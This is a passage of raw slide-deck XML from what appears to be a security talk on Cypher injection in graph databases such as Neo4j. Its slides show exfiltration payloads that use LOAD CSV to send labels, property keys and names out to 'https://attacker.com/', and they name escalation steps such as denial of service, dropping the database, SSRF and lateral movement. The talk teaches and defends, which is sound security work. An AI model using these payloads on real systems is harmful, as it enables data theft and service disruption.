          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681100" y="439075"/>
            <a:ext cx="64629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7200"/>
              <a:t>Blind </a:t>
            </a:r>
            <a:endParaRPr sz="7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7200"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3472" name="Google Shape;3472;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="16418" r="21483" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-270200" y="1621100"/>
            <a:ext cx="4143899" cy="35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p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402600" y="2585975"/>
            <a:ext cx="57414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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="3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Comes To The Rescue!</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3474" name="Google Shape;347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8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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238500" y="117575"/>
            <a:ext cx="87939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Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Labels</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3480" name="Google Shape;3480;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="19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1" name="Google Shape;3481;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55350" y="1244000"/>
            <a:ext cx="91440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CALL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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3000" u="none" cap="none" strike="noStrik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db.labels() </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="30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YIELD</a:t>
            </a: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3000" u="none" cap="none" strike="noStrik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label</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="30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endParaRPr b="0" i="0" sz="3000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM</a:t>
            </a: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b="1" i="0" lang="en" sz="30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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="3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'+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="073763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label</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="3000" u="none" cap="none" strike="noStrike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</a:t>
            </a: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30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i="0" lang="en" sz="3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b//</a:t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2" name="Google Shape;3482;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="20482" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1071563"/>
            <a:ext cx="9144000" cy="32157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83" name="Google Shape;348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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28450" y="41375"/>
            <a:ext cx="9144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400"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3489" name="Google Shape;3489;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="19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0" name="Google Shape;3490;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="1257375"/>
            <a:ext cx="896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(c:Character)</a:t>
            </a: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</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM</a:t>
            </a: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b="1" i="0" lang="en" sz="2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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="24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'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+apoc.text.join(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="no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keys(c),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' ')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</a:t>
            </a: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b//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1" name="Google Shape;3491;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5589" l="0" r="10584" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="938826"/>
            <a:ext cx="9144001" cy="361959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92" name="Google Shape;349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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="117575"/>
            <a:ext cx="8844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400"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Names</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3498" name="Google Shape;3498;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="1950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9" name="Google Shape;3499;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="1071563"/>
            <a:ext cx="896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MATCH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(c:Character)</a:t>
            </a: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  </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM</a:t>
            </a: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'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="24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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="24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'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+c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="no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.name</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2400" u="none" cap="none" strike="noStrike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AS</a:t>
            </a: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i="0" lang="en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b//</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2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00" name="Google Shape;350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49425" y="2559950"/>
            <a:ext cx="4979949" cy="250927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1" name="Google Shape;350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650" y="2559954"/>
            <a:ext cx="3872039" cy="250927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2" name="Google Shape;350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p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719150" y="1061400"/>
            <a:ext cx="6433800" cy="319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6" name="Google Shape;3146;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-689525" y="2680500"/>
            <a:ext cx="3224700" cy="116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7" name="Google Shape;3147;p3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4000"/>
              <a:t>Takeaways</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3148" name="Google Shape;3148;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="1243275"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3149" name="Google Shape;3149;p3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Cypher &amp; Graph Databases</a:t>
              </a:r>
              <a:endParaRPr b="0" i="0" sz="2500" u="none" cap="none" strike="noStrik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50" name="Google Shape;3150;p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51" name="Google Shape;3151;p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52" name="Google Shape;3152;p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3153" name="Google Shape;3153;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="1852875"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3154" name="Google Shape;3154;p3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Injection Time!</a:t>
              </a:r>
              <a:endParaRPr b="0" i="0" sz="2500" u="none" cap="none" strike="noStrik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55" name="Google Shape;3155;p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56" name="Google Shape;3156;p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57" name="Google Shape;3157;p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3158" name="Google Shape;3158;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="2462475"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3159" name="Google Shape;3159;p3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Attack Escalation</a:t>
              </a:r>
              <a:endParaRPr b="0" i="0" sz="25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60" name="Google Shape;3160;p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61" name="Google Shape;3161;p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62" name="Google Shape;3162;p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3163" name="Google Shape;3163;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="3072075"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3164" name="Google Shape;3164;p3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Remediation &amp; Mitigation</a:t>
              </a:r>
              <a:endParaRPr b="0" i="0" sz="2500" u="none" cap="none" strike="noStrik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65" name="Google Shape;3165;p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66" name="Google Shape;3166;p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67" name="Google Shape;3167;p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3168" name="Google Shape;3168;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="3681675"/>
            <a:ext cx="7341525" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="7341525" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3169" name="Google Shape;3169;p3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="6878100" cy="50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en" sz="2500" u="none" cap="none" strike="noStrike">
                  <a:solidFill>
                    <a:schemeClr val="dk1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 What Now - A New Era of Injections</a:t>
              </a:r>
              <a:endParaRPr b="0" i="0" sz="2500" u="none" cap="none" strike="noStrik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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3170" name="Google Shape;3170;p3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3171" name="Google Shape;3171;p3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="407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3172" name="Google Shape;3172;p3"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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3173" name="Google Shape;317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7" name="Google Shape;3507;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11112" l="0" r="4441" t="10956"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-476050" y="2187750"/>
            <a:ext cx="4742726" cy="290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8" name="Google Shape;3508;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3061075" y="1035675"/>
            <a:ext cx="61755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More </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="60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Damage</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="6000" u="none" cap="none" strike="noStrike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3509" name="Google Shape;3509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3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p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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800"/>
              <a:t>Attack Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3515" name="Google Shape;3515;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="1501625"/>
            <a:ext cx="2753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900"/>
              <a:t>Denial-Of-Service</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3516" name="Google Shape;3516;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="1848300"/>
            <a:ext cx="27537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Preventing access to the database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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="1107869"/>
            <a:ext cx="774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01</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3518" name="Google Shape;3518;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="3407625"/>
            <a:ext cx="3005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/>
              <a:t>Lateral Movement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900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3519" name="Google Shape;3519;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="3754300"/>
            <a:ext cx="33804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Escalating to other machines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0" name="Google Shape;3520;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="3013869"/>
            <a:ext cx="774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03</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3521" name="Google Shape;3521;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816300" y="1501625"/>
            <a:ext cx="2753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900"/>
              <a:t>SSRF &amp; RFI</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3522" name="Google Shape;3522;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816300" y="1848300"/>
            <a:ext cx="30051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Accessing sensitive endpoints &amp; files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3" name="Google Shape;3523;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819399" y="1107875"/>
            <a:ext cx="22035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02</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3524" name="Google Shape;3524;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8860925" y="1544075"/>
            <a:ext cx="36575" cy="73125"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2925" w="1463">
                <a:moveTo>
                  <a:pt x="1462" y="1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1119" y="586"/>
                  <a:pt x="780" y="1217"/>
                  <a:pt x="437" y="1852"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="437" y="1899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="2242"/>
                  <a:pt x="145" y="2581"/>
                  <a:pt x="1" y="2873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="2873"/>
                  <a:pt x="98" y="2924"/>
                  <a:pt x="98" y="2924"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="535" y="1950"/>
                  <a:pt x="975" y="975"/>
                  <a:pt x="1462" y="1"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00BE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5" name="Google Shape;3525;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847000" y="3407619"/>
            <a:ext cx="2480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900"/>
              <a:t>Alternatives</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3526" name="Google Shape;3526;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847000" y="3755225"/>
            <a:ext cx="3849600" cy="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LOAD CSV alternatives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200">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In Neo4J &amp; other databases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Google Shape;3527;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819400" y="3013869"/>
            <a:ext cx="7749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04</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3528" name="Google Shape;3528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2" name="Shape 3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3" name="Google Shape;3533;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465775"/>
            <a:ext cx="914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800"/>
              <a:t>DoS - Leak &amp; Kill Connections</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3534" name="Google Shape;3534;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39265" l="0" r="63698" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="215175" y="1001325"/>
            <a:ext cx="8713625" cy="3200393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5" name="Google Shape;353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400" y="1176038"/>
            <a:ext cx="7486650" cy="857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6" name="Google Shape;3536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550" y="1252675"/>
            <a:ext cx="8876500" cy="632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7" name="Google Shape;353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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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3600"/>
              <a:t>Drop Database</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3543" name="Google Shape;3543;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="42992" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766175" y="1023775"/>
            <a:ext cx="5343001" cy="38769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44" name="Google Shape;354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656" y="1621985"/>
            <a:ext cx="7972675" cy="2034581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5" name="Google Shape;354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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29175" y="897850"/>
            <a:ext cx="6020400" cy="169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7200"/>
              <a:t>More </a:t>
            </a:r>
            <a:endParaRPr sz="7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7200"/>
              <a:t>Damage</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3551" name="Google Shape;355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2525" y="1477825"/>
            <a:ext cx="3701700" cy="33780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2" name="Google Shape;355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p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="36000"/>
          </a:blip>
          <a:srcRect b="25098" l="45929" r="1380" t="2259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760100" y="1463828"/>
            <a:ext cx="2176500" cy="254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58" name="Google Shape;355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525" y="1974452"/>
            <a:ext cx="1629000" cy="111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9" name="Google Shape;3559;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326800" y="344875"/>
            <a:ext cx="88737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SSRF Through Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3560" name="Google Shape;3560;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267500" y="666938"/>
            <a:ext cx="49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erver-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equest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orgery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1" name="Google Shape;356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3424" y="2183225"/>
            <a:ext cx="1407015" cy="950682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p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4573125" y="2015475"/>
            <a:ext cx="1224600" cy="122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 b="1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3" name="Google Shape;3563;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936800" y="16280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4" name="Google Shape;3564;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2023638" y="2321589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Google Shape;3565;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4114963" y="2321589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6" name="Google Shape;3566;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6179675" y="2315489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7" name="Google Shape;3567;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2000111" y="2778801"/>
            <a:ext cx="287326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8" name="Google Shape;3568;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4091449" y="2780776"/>
            <a:ext cx="287326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9" name="Google Shape;3569;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6135261" y="2780776"/>
            <a:ext cx="287326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0" name="Google Shape;357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67800" y="2227150"/>
            <a:ext cx="1208601" cy="86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Google Shape;357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6238" y="1291077"/>
            <a:ext cx="1629000" cy="111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72" name="Google Shape;3572;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619450" y="3284100"/>
            <a:ext cx="4488600" cy="690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3" name="Google Shape;3573;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
